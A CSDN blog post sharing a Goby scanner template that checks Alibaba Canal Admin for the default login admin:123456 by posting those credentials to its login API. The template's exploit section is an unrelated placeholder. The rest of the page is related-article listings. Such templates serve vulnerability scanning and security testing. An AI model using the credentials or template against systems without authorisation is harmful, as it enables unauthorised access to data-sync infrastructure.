阿里canal默认密码

最新推荐文章于 2023-06-14 16:43:23 发布
最新推荐文章于 2023-06-14 16:43:23 发布
阅读量1.3k 收藏
点赞数
分类专栏: exp 文章标签: canal exp goby
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cch139745/article/details/121095502
版权

阿里canal默认密码 goby exp

声明

本程序仅供于学习交流,请使用者遵守《中华人民共和国网络安全法》,勿将此脚本用于非授权的测试,脚本开发者不负任何连带法律责任。

代码

{
      "Name": "alibaba canal default password",
      "Level": "3",
      "Tags": [
            "defaultaccount"
      ],
      "GobyQuery": "title=\"Canal Admin\"|body=\"Canal Admin Login\"",
      "Description": "alibaba canal has a default password problem. Attackers can log in through admin:123456",
      "Product": "Remote attacker can use this default to control the system",
      "Homepage": "https://github.com/alibaba/canal",
      "Author": "aetkrad",
      "Impact": "",
      "Recommendation": "",
      "References": [],
      "HasExp": false,
      "ExpParams": null,
      "ExpTips": {
            "Type": "",
            "Content": ""
      },
      "ScanSteps": [
            "AND",
            {
                  "Request": {
                        "method": "POST",
                        "uri": "/api/v1/user/login",
                        "follow_redirect": false,
                        "header": null,
                        "data_type": "text",
                        "data": "",
                        "set_variable": []
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$code",
                                    "operation": "==",
                                    "value": "200",
                                    "bz": ""
                              },
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "com.alibaba.otter.canal.admin.controller.UserController.login",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": [
                        "output|lastbody|regex|"
                  ]
            },
            {
                  "Request": {
                        "method": "POST",
                        "uri": "/api/v1/user/login",
                        "follow_redirect": false,
                        "header": {
                              "Content-Type": "application/json"
                        },
                        "data_type": "text",
                        "data": "{\"username\":\"admin\",\"password\":\"123456\"}",
                        "set_variable": []
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$code",
                                    "operation": "==",
                                    "value": "200",
                                    "bz": ""
                              },
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "{\"code\":20000,",
                                    "bz": "\"data\":{\"token\""
                              }
                        ]
                  },
                  "SetVariable": [
                        "output|lastbody|regex|"
                  ]
            }
      ],
      "ExploitSteps": [
            "AND",
            {
                  "Request": {
                        "method": "GET",
                        "uri": "/test.php",
                        "follow_redirect": true,
                        "header": null,
                        "data_type": "text",
                        "data": "",
                        "set_variable": []
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$code",
                                    "operation": "==",
                                    "value": "200",
                                    "bz": ""
                              },
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "test",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": [
                        "output|lastbody|regex|"
                  ]
            }
      ],
      "PostTime": "2021-10-31 17:23:05",
      "GobyVersion": "1.8.302"
}

#poc集合
地址:https://github.com/aetkrad/goby_poc
帮助到你的话给个星吧!

aetkrad
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
开发知识点-RabbitMQ
aming小老弟
01-11 1409
RabbitMQ是一个使用Erlang语言开发 开源的消息中间件项目(Message Broker),采用Mozilla Public License(MPL)开源许可证。这意味着任何人都可以自由获取、使用、修改和分发RabbitMQ的源代码。实现了高级消息队列协议(AMQP)并提供可靠的、异步的消息传递机制。可以让你在不同的应用之间传递数据,用来实现分布式系统中的异步通信。有很多优点,比如可靠性、灵活性、集群性、多协议支持等。
Apache Airflow Unauthorized
不光要学,知识要能说出口
11-01 2281
声明 本程序仅供于学习交流,请使用者遵守《中华人民共和国网络安全法》,勿将此脚本用于非授权的测试,脚本开发者不负任何连带法律责任。 代码 { "Name": "Apache Airflow Unauthorized", "Level": "3", "Tags": [ "Unauthorized" ], "GobyQuery": "app=\"APACHE-Airflow\"", "Description": "r
一个Airflow2.1.3 experimental api 请求异常问题
zhangs_123的博客
04-01 419
一个Airflow2.1.3 experimental api 请求异常问题
canal基本知识
剑雨江湖
09-03 2178
1、canal a、数据库设置 1.在/etc/my.cmf文件下添加以下三句话: log-bin = mysql-bin binlog-format=Row binlog_row_image =FULL (默认就是FULL不配也可以,出现数据字段丢失,就必须要配置) server-id=1 关于:binlog_row_image参数的说明:https://blog.csdn...
ActiveMQ修改密码(访问密码和登录密码
wo4owen的博客
01-16 6228
ActiveMQ修改密码(访问密码和登录密码) 转载自https://www.sunjs.com/article/detail/e15c588dd62b40b5bcab15635507ef54.html如有侵权请联系删除 作者:laosun 首先修改网页登录密码 1: 打开安装目录,进入conf目录,找到jetty.xml 上边的 authenticate 修改成true 然后打开同目录下的jetty-realm.properties。 用户名:密码,角色; 根据这个修改即可。修.
dubbo-admin默认账号密码登录失败,root和guest
a704397849的博客
06-12 1万+
原文:https://jixinggaozhao.iteye.com/blog/2391216 用 账号root ,密码guest 去登录 dubbo-admin一直失败 错误原因其实是账号密码搞错了。 dubbo-admin/WEB-INF/dubbo.properties 默认用户信息配置如下: dubbo.registry.address=zookeeper://127.0.0.1:218...
阿里canal中间件
03-14
阿里Canal是一款由阿里巴巴开源的数据同步中间件,其主要功能是监控MySQL的二进制日志(binlog),并将这些日志事件实时地同步到其他系统或服务中,以实现数据库之间的数据一致性或者构建实时的数据复制系统。...
阿里canal1.1.4全.zip
07-03
阿里Canal 1.1.4是阿里巴巴开源的一款数据库实时数据同步工具,它主要用于数据库的增量数据订阅与推送。Canal的设计灵感来源于Facebook的MyCDC,它的主要目标是实现高性能、高可用、高稳定性的数据库实时复制。在这...
阿里canal组件:canal.deployer-1.1.7-SNAPSHOT.tar.gz
01-06
阿里Canal是一款由阿里巴巴开源的、轻量级的数据变更订阅与推送组件,主要用来实现数据库的增量数据同步。在IT行业中,特别是在互联网公司,数据一致性是至关重要的,而Canal就是为了满足这种需求而诞生的。它能有效...
canal-阿里增量日志解析组件-1.1.5
04-06
阿里增量日志解析组件Canal详解》 在大数据领域,实时数据同步是不可或缺的一环,而阿里开源的Canal组件则为此提供了强大的解决方案。Canal是一个轻量级的MySQL数据库增量日志抽取框架,主要用于实现数据库增量...
阿里开源canal的扩展生产mq增加key和tag关联业务
08-23
阿里的开源canal通过订阅binlog可以生产mq消息,实现了数据链路的对接和输出,为我们在做业务兼容,业务迁移的过程中提供了很多便利,但是个人在工作中发现有一个问题,就是目前个版本生产的消息都没有key和tag,...
初识MINIO
最新发布
06-14 9329
MinIO 是一款基于Go语言发开的高性能、分布式的对象存储系统。客户端支持Java,Net,Python,Javacript, Golang语言。
minio使用
lz13419607299的博客
07-15 1万+
minio文件服务器
centos7 APACHE-AMBARI-2.7.4.0(Ambari 本地源安装)
Zcoder`Blog
10-11 4998
目录 一、Ambari 简介 二、软件准备 1. 软件要求 2. Ambari 软件包下载 三、搭建HDP集群 1. 搭建 Master 节点 1.1 新建虚拟机 1.2 配置虚拟机网络 1.3 关闭防火墙 firewalld 和 Selinux 1.4 修改host 1.5 设置阿里云的yum源 1.6 安装时间同步服务 NTP 1.7 安装并配置JDK 1.8 禁用...
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接
qq_45234543的博客
11-23 2405
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接,docker未授权漏洞利用,ssh密钥连接
windows 下搭建minio 服务,设置密码和端口号
热门推荐
wlj_wangjun的博客
12-17 1万+
1.先在官网下载 minio.exe. 在 minio.exe 所在文件夹 打开命令窗口,输入minio.exe server d:\minio d:\minio 表示 文件存储路径 启动成功后可以通过 127.0.0.1:9000 来访问。默认用户名和密码 是 minioadmin/minioadmin 2.设置密码:找到 .minio.sys/config/config.json 文件,打开搜索access_key , 修改 access_key :value 用户名 s...
常用日志解决方案实践与学习
xiaosi的博客
09-08 1837
一个功能完善的日志系统是企业在日常产品、项目开发中是必须的,接触过bug fix的同学应该深有体会一份记录详细完善的日志能提升的小笼包,之前参与项目架构技术会的时候,谈论到了日志技术的选型及实现,鉴于对该方面还不太熟悉,决定需要花时间学习实践一下,拿着常见成熟的轮子跑一跑…学习分析下原理…一、利用中间件Canal来记录操作日志 原理分析canal实践二、通过文件形式记录日志操作人如何记录操作日志如何与系统日志分开基于注解如何生成可读的日志方案基于AOP注解日志实现原理分析三、ELK日志解决
canal admin管理端配置-多个实例的创建(二)
后端开发
03-07 2278
单节点的canal服务注册到canal admin中
RabbitMQ安装
https://hibernation0814.github.io/
04-11 1374
RabbitMQ安装及简单实例
canal简介.ppt
02-24
canal简介.ppt

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值